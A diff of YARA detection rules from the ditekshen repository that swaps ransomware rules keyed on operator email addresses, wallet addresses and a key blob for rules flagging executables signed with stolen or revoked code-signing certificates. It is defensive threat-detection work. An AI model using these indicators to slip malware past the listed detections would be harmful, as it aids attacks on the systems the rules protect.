-		id = "406f5638-883b-57a4-a2ba-532d2bd3ae83"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "c273f7e4-8c88-5205-be4b-3a8e8bed144e"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L237-L247"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4075-L4086"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c8c5dcc0d7484a3ac6e702cca8bd0907f9e4f4aea5e99c4c3f988389e0d803a7"
+		logic_hash = "e502e7e08fa82f8bd1b2b15c34999ece6b3d59d75ab1a4dda05b4b9440c49b7c"
 		score = 75
-		quality = 69
-		tags = ""
-
-	strings:
-		$s1 = "olaggoune235@protonmail.ch" ascii wide nocase
-		$s2 = "ouardia11@tutanota.com" ascii wide nocase
-		$s3 = "laggouneo11@gmail.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "3f27a35fe7af06977138d02ad83ddbf13a67b7c3"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Maxthon Technology Co, Ltd." and pe.signatures [ i ] . serial == "4f:8e:bb:b2:63:f3:cb:e5:58:d3:71:18:c4:3f:8d:58" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Cuba
+
+rule DITEKSHEN_INDICATOR_KB_CERT_01Ea62E443Cb2250C870Ff6Bb13Ba98E : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with JobCryptor ransomware"
-		author = "ditekShen"
-		id = "5eea027d-2164-54f2-a2bf-74b5d532e610"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "40c5f73b-70b6-5db7-8060-01ad77e5f319"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L249-L261"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4088-L4099"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b734199c8593c338c803518b2729e9d9ceaaed5d21585a3d299885433d8f796e"
+		logic_hash = "dbf281989fb89976f83e0e2395f02c1e8c4c9ec5f96095786d9c6406518eb315"
 		score = 75
-		quality = 65
-		tags = ""
-
-	strings:
-		$s1 = "helpadmin2@protonmail.com" ascii wide nocase
-		$s2 = "helpadmin2@cock.li" ascii wide nocase
-		$s3 = "mfra@cock.li" ascii wide nocase
-		$s4 = "admin@cuba-supp.com" ascii wide nocase
-		$s5 = "cuba_support@exploit.im" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "f293eed3ff3d548262cddc43dce58cfc7f763622"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tencent Technology(Shenzhen) Company Limited" and pe.signatures [ i ] . serial == "01:ea:62:e4:43:cb:22:50:c8:70:ff:6b:b1:3b:a9:8e" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Hello
+
+rule DITEKSHEN_INDICATOR_KB_CERT_726Ee7F5999B9E8574Ec59969C04955C : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Hello / WickrMe ransomware"
-		author = "ditekShen"
-		id = "02bbaa61-7ea3-5edd-8b38-27ef1f6ee1e2"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects IntelliAdmin commercial remote administration signing certificate"
+		author = "ditekSHen"
+		id = "5e88abd2-97d5-5271-ace5-6b7cb2cd6633"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L263-L277"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4101-L4112"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dfafb0323a50891c03c4b706d4f3a6a511cecdee2448c1f554b416ba1e3d3df9"
+		logic_hash = "494afa3711d93c56d52b8ae944db737cb53db8d27f2255c7045c3bf4478995a3"
 		score = 75
-		quality = 61
-		tags = ""
-
-	strings:
-		$s1 = "emming@tutanota.com" ascii wide nocase
-		$s2 = "ampbel@protonmail.com" ascii wide nocase
-		$s3 = "asauribe@tutanota.com" ascii wide nocase
-		$s4 = "candietodd@tutanota.com" ascii wide nocase
-		$s5 = "kellyreiff@tutanota.com" ascii wide nocase
-		$s6 = "kevindeloach@protonmail.com" ascii wide nocase
-		$s7 = "sheilabeasley@tutanota.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "2fb952bc1e3fcf85f68d6e2cb5fc46a519ce3fa9"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IntelliAdmin, LLC" and pe.signatures [ i ] . serial == "72:6e:e7:f5:99:9b:9e:85:74:ec:59:96:9c:04:95:5c" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Unlockyourfiles
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0A005D2E2Bcd4137168217D8C727747C : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with UnlockYourFiles ransomware"
-		author = "ditekShen"
-		id = "fdc3ec49-66cc-5a0b-87a6-3660dd6f3b72"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "c3888d90-0c09-539a-9155-a60e4670320d"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L279-L288"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4114-L4125"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a33dae7f08eb0c2415fbfdadf2cbbf90c68bc802352277422c6d0a2dbd62cd82"
+		logic_hash = "b4024cd0d6c9a86d3956b9ba5d9692fc7ec2d7aa399a56a0b12f9387801a0b08"
 		score = 75
-		quality = 71
-		tags = ""
-
-	strings:
-		$s1 = "4lok3r@tutanota.com" ascii wide nocase
-		$s2 = "4lok3r@protonmail.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "df788aa00eb400b552923518108eb1d4f5b7176b"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing JoinHope Image Technology Ltd." and pe.signatures [ i ] . serial == "0a:00:5d:2e:2b:cd:41:37:16:82:17:d8:c7:27:74:7c" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Darkside
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D3D74Ae548830D5B1Bca9856E16C564A : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with DarkSide ransomware"
-		author = "ditekShen"
-		id = "7b29b9b9-4657-551e-b770-880a2278ef60"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "692ef744-9609-5cb1-b425-3bacf012fcdb"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L290-L299"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4127-L4138"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3c6cdb15cad19f1db38c0fe03ecb24d5cd4861a699aa2bee0f99b8dddacc8bd1"
+		logic_hash = "c72f10af530a6af4526ad956ef6058d097417a8fe3b902e3c7cba27b04e0c2c1"
 		score = 75
-		quality = 73
-		tags = ""
-		hash1 = "bafa2efff234303166d663f967037dae43701e7d63d914efc8c894b3e5be9408"
-
-	strings:
-		$s1 = "breathcojunktab1987@yahoo.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "3f996b75900d566bc178f36b3f4968e2a08365e8"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Insite Software Inc." and pe.signatures [ i ] . serial == "00:d3:d7:4a:e5:48:83:0d:5b:1b:ca:98:56:e1:6c:56:4a" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Spyro
+
+rule DITEKSHEN_INDICATOR_KB_CERT_41F8253E1Ceafbfd8E49F32C34A68F9E : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Spyro ransomware"
-		author = "ditekShen"
-		id = "9a42a9fd-dfaf-5719-acae-e7c3b92ecdc9"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "84bd03de-88cd-5180-af11-916dbecd0366"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L301-L310"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4140-L4151"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b12b24b7b1b9800d249fd322532d957ddfc020c495ca89414d8d7e9fa7d58eb7"
+		logic_hash = "53f71030815dcdda8424fe858d26a08cf947a683e69c50ea5fda53f51b88bb93"
 		score = 75
-		quality = 71
-		tags = ""
-
-	strings:
-		$s1 = "blackspyro@tutanota.com" ascii wide nocase
-		$s2 = "blackspyro@mailfence.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "02e739740b88328ac9c4a6de0ee703b7610f977b"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shenzhen Smartspace Software technology Co.,Limited" and pe.signatures [ i ] . serial == "41:f8:25:3e:1c:ea:fb:fd:8e:49:f3:2c:34:a6:8f:9e" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Ryzerlo
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0A5B4F67Ad8B22Afc2Debe6Ce5F8F679 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Ryzerlo / HiddenTear / RSJON ransomware"
-		author = "ditekShen"
-		id = "1e8b79dc-4a81-5126-a7a3-ad7a2e8f62bf"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "e1cc3d27-4f76-58a8-8dd6-fd8dbe48252e"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L312-L320"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4153-L4164"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2d925cac74411c3e408d674e27a27ae029d39977026a79df8f90edae345a31db"
+		logic_hash = "19cf46c112b546c26f12891727fdbc74aaa78bbdcdbc4e041781394f4cf5f719"
 		score = 75
-		quality = 73
-		tags = ""
-
-	strings:
-		$s1 = "darkjon@protonmail.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "1213865af7ddac1568830748dbdda21498dfb0ba"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Farad LLC" and pe.signatures [ i ] . serial == "0a:5b:4f:67:ad:8b:22:af:c2:de:be:6c:e5:f8:f6:79" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_PYSA
+
+rule DITEKSHEN_INDICATOR_KB_CERT_65Cd323C2483668B90A44A711D2A6B98 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with PYSA / Mespinoza ransomware"
-		author = "ditekShen"
-		id = "b26d472b-c94e-576d-b168-6f273bb8fca5"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "b976e930-cf9a-5b0f-9a1b-c35c3f134bdd"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L322-L340"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4166-L4177"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cf0fbc0160f1d21efdb4a6935ae0d2206107042e3d020722f50d2c302aff246c"
+		logic_hash = "e0a9868f9a42aeb8f90aff540a73bc8fa1bfebbf8ee6c0c71bd921cf914e0875"
 		score = 75
-		quality = 55
-		tags = ""
-
-	strings:
-		$s1 = "luebegg8024@onionmail.org" ascii wide nocase
-		$s2 = "mayakinggw3732@onionmail.org" ascii wide nocase
-		$s3 = "lauriabornhat7722@protonmail.com" ascii wide nocase
-		$s4 = "DeborahTrask@onionmail.org" ascii wide nocase
-		$s5 = "AlisonRobles@onionmail.org" ascii wide nocase
-		$s6 = "NatanSchultz67@protonmail.com" ascii wide nocase
-		$s7 = "jonikemppi@onionmail.org" ascii wide nocase
-		$s8 = "lanerosalie49003@onionmail.org" ascii wide nocase
-		$s9 = "bernalmargaret645@onionmail.org" ascii wide nocase
-		$s10 = "carlhubbard2021@protonmail.com" ascii wide nocase
-		$u1 = "http://pysa2bitc" ascii wide
+		quality = 75
+		tags = "FILE"
+		thumbprint = "188810cf106a5f38fe8aa0d494cbd027da9edf97"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Giperion" and pe.signatures [ i ] . serial == "65:cd:32:3c:24:83:66:8b:90:a4:4a:71:1d:2a:6b:98" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Ranzylocker
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0F7E3Fda780E47E171864D8F5386Bc05 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with RanzyLocker ransomware"
-		author = "ditekShen"
-		id = "33478dc4-c0ec-5cc8-8620-79e770f6a773"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "33b8ce54-fa2c-5aac-9022-2309f7fc4a86"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L354-L363"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4192-L4203"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dc345257a3cca82a95e20505c94e90d8ac42240e1491ea1f34be121871673e26"
+		logic_hash = "30e2daf85ee7f9f9615a49af949a034b50a97a1a7abf6a318547809cc9e7b0b7"
 		score = 75
-		quality = 71
-		tags = ""
-
-	strings:
-		$s1 = "eviluser@tutanota.com" ascii wide nocase
-		$s2 = "evilpr0ton@protonmail.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "1e3dd5576fc57fa2dd778221a60bd33f97087f74"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Louhos Solutions Oy" and pe.signatures [ i ] . serial == "0f:7e:3f:da:78:0e:47:e1:71:86:4d:8f:53:86:bc:05" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Alkhal
+
+rule DITEKSHEN_INDICATOR_KB_CERT_C2Cbbd946Bc3Fdb944D522931D61D51A : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with AlKhal ransomware"
-		author = "ditekShen"
-		id = "32e14a6e-fc2e-5c0a-b8e3-33e219923d90"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with Sordum Software certificate, particularly Defender Control"
+		author = "ditekSHen"
+		id = "b8ccfb1a-4e3f-5823-af38-e1607458023e"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L365-L374"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4231-L4242"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bd2d66a9cd33ab15b451158cd6c0e6579735653611ee2e6c8045a5807091938d"
+		logic_hash = "6e67835cf85c713ef5a21b866a277e90236c607fb67d3fd9b2bba627c31d9e97"
 		score = 75
-		quality = 71
-		tags = ""
-
-	strings:
-		$s1 = "alkhal@tutanota.com" ascii wide nocase
-		$s2 = "cyrilga@tutanota.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "f5e71628a478a248353bf0177395223d2c5a0e43"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sordum Software" and pe.signatures [ i ] . serial == "c2:cb:bd:94:6b:c3:fd:b9:44:d5:22:93:1d:61:d5:1a" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_DECAF
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6E3B09F43C3A0Fd53B7D600F08Fae2B5 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with DECAF ransomware"
-		author = "ditekShen"
-		id = "24422015-56f3-503e-a902-0183eb601b22"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "d23e7b9b-4424-50c5-a768-9cb33e0de192"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L376-L408"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4244-L4255"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8fca3a6564cd11e625b65e7f0f278b79678368dd0c77440e9f8d46035e0c3426"
+		logic_hash = "45e2833dedacd875912d07dc63216400ddff76846f9c7bdf808f1db56ed4720c"
 		score = 75
-		quality = 73
-		tags = ""
-
-	strings:
-		$s1 = "22eb687475f2c5ca30b@protonmail.com" ascii wide nocase
-		$s2 = { 4d 49 49 42 43 67 4b 43 41 51 45 41 71 34 6b 31
-                48 64 62 31 54 48 72 7a 42 42 65 4f 31 38 34 6b
-                6e 43 62 42 4b 72 30 33 61 70 66 58 71 6c 4f 6b
-                53 64 74 48 53 4a 67 66 79 49 71 4a 50 47 78 6c
-                0a 2f 63 46 69 73 4a 6d 56 58 52 33 2f 74 34 65
-                39 46 62 4c 73 45 49 75 54 70 39 50 4a 54 63 69
-                6f 6d 48 66 72 35 43 67 43 51 7a 68 6e 41 5a 30
-                41 76 6a 47 42 61 57 50 36 4b 70 43 79 66 44 6e
-                73 0a 79 62 72 75 79 4b 71 79 67 61 57 70 5a 53
-                41 6e 7a 52 64 42 2b 54 41 6b 75 35 69 71 79 38
-                71 31 56 77 6e 4e 35 37 51 42 6c 74 72 6f 30 59
-                4a 5a 38 65 6e 4b 5a 52 54 6c 63 7a 6d 74 6a 65
-                4f 70 0a 42 2f 78 75 54 4f 75 44 6a 6d 55 53 4e
-                69 47 79 69 6a 57 42 56 66 59 6b 37 73 56 58 6c
-                2f 6c 51 38 74 61 58 72 33 36 78 50 57 68 4d 49
-                47 30 45 71 52 56 72 46 56 2b 63 61 76 53 37 5a
-                34 76 61 0a 79 58 6d 63 66 35 35 4e 6b 70 4d 47
-                4b 4b 59 38 75 71 76 77 62 34 61 4c 49 4b 61 62
-                65 6b 32 6e 55 57 42 67 4e 67 53 4f 74 71 42 4c
-                4c 4c 32 41 32 62 59 2f 35 73 30 47 4a 2f 56 56
-                2b 45 6d 49 0a 58 37 2f 7a 49 2b 46 63 65 55 2b
-                64 63 4e 58 2f 69 72 30 75 6a 50 34 79 73 34 6d
-                2f 6a 6a 5a 44 34 77 49 44 41 51 41 42 }
+		quality = 75
+		tags = "FILE"
+		thumbprint = "677054afcbfecb313f93f27ed159055dc1559ad0"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Divisible Limited" and pe.signatures [ i ] . serial == "6e:3b:09:f4:3c:3a:0f:d5:3b:7d:60:0f:08:fa:e2:b5" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Babuk
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Aa12C95D2Bcde0Ce141C6F1145B0D7Ef : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Babuk ransomware"
-		author = "ditekShen"
-		id = "139cea69-9661-5cb7-bf74-a14e3556c759"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "66ef7681-7467-5c9f-8e0b-749a9711f15a"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L410-L426"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4257-L4268"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "129b1364bb59423aab1f5f67a4c2d2a76a9c4f55aa6aa1e59bcebc717a14ee19"
+		logic_hash = "34edd92640d8059f074513b526c7a2bf0d9265af9466a2ae66b93255044744c4"
 		score = 75
-		quality = 61
-		tags = ""
-
-	strings:
-		$s1 = "mitnickd@ctemplar.com" ascii wide nocase
-		$s2 = "zar8b@tuta.io" ascii wide nocase
-		$s3 = "recover300dollars@gmail.com" ascii wide nocase
-		$s4 = "support.3330@gmail.com" ascii wide nocase
-		$s5 = "decryptdelta@gmail.com" ascii wide nocase
-		$s6 = "pyotrmaksim@gmail.com" ascii wide nocase
-		$s7 = "retrievedata300@gmail.com" ascii wide nocase
-		$s8 = "3JG36KY6abZTnHBdQCon1hheC3Wa2bdyqs" ascii wide
-		$s9 = "46zdZVRjm9XJhdjpipwtYDY51NKbD74bfEffxmbqPjwH6efTYrtvbU5Et4AKCre9MeiqtiR51Lvg2X8dXv1tP7nxLaEHKKQ" ascii wide
+		quality = 75
+		tags = "FILE"
+		thumbprint = "1383c4aa2900882f9892696c537e83f1fb20a43f"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PROKON, OOO" and pe.signatures [ i ] . serial == "00:aa:12:c9:5d:2b:cd:e0:ce:14:1c:6f:11:45:b0:d7:ef" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Rapid
+
+rule DITEKSHEN_INDICATOR_KB_CERT_03E9Eb4Dff67D4F9A554A422D5Ed86F3 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Rapid ransomware"
-		author = "ditekShen"
-		id = "a1c6f3c0-2fec-5d96-9965-8129a843ae90"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "b76ab1af-01f9-5d03-8d5e-7314a7a2de43"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L428-L436"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ea82a3fcb1d836e1c250e9a576064e1babdb82b4970555260af2eb68726cfd16"
-		score = 75
-		quality = 73
-		tags = ""
-
-	strings:
-		$s1 = "jimmyneytron@tuta.io" ascii wide nocase
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4270-L4281"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "a56f53cb94f78496b4935fc2a613d030bd550b749427501dd9dda18cb9e05ab3"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		thumbprint = "8f2de7e770a8b1e412c2de131064d7a52da62287"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "philandro Software GmbH" and pe.signatures [ i ] . serial == "03:e9:eb:4d:ff:67:d4:f9:a5:54:a4:22:d5:ed:86:f3" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Satana
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4A7F07C5D4Ad2E23F9E8E03F0E229Dd4 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Satana ransomware"
-		author = "ditekShen"
-		id = "a362d4ca-d475-5392-a3ac-45337425d8e7"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "4e39ae25-c62c-5018-9780-d1549b10942f"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L438-L447"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4283-L4294"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6d82e2497044518cee1b56da85f1ad6ac7934eec9ca68501932d55add4236d45"
+		logic_hash = "2493dfe7e5a993a573c7b3c2f2642a8834feb525b3fc8402315a63ac09b9fccd"
 		score = 75
-		quality = 73
-		tags = ""
-
-	strings:
-		$s1 = "adamadam@ausi.com" ascii wide nocase
-		$s2 = "XsrR2he2Z8un5ysGWnJ1wveZRPRS96XEoX" ascii wide
+		quality = 75
+		tags = "FILE"
+		thumbprint = "b37e7f9040c4adc6d29da6829c7a35a2f6a56fdb"
+		importance = 20
 
 	condition:
-		any of them
